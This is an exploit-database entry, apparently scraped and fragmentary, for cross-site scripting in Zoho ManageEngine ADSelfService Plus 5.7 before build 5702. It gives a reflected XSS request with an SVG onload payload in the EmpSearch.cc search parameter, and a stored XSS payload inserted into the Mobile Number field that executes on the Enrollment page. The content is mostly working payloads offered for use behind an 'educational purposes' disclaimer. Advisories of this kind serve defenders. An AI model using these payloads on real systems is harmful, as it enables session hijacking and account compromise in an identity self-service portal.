Exploits / Vulnerability Discovered : 2019-05-09 |
Type : webapps |
Platform : php
This exploit / vulnerability Zoho manageengine adselfservice plus 5.7 < 5702 build crosssite scripting is for educational purposes only and if it is used you will do on your own risk!
POST /EmpSearch.cc?operation=getSearchResult&REQUEST_TYPE=JSON&searchString=RR<svg%2fonload%3dprompt(8)>&searchType=contains&searchBy=ALL_FIELDS&actionId=Search HTTP/1.1
&adscsrf=
4- Stored XSS in self-update layout implementation.
/SelfService.do?methodToCall=selfService&selectedTab=UpdateFields
Insert the following payload into Mobile Number field, and save
Payload: 11111111]";a=alert,a(31337)//
Code execute here:
/Enrollment.do?selectedTab=Enrollment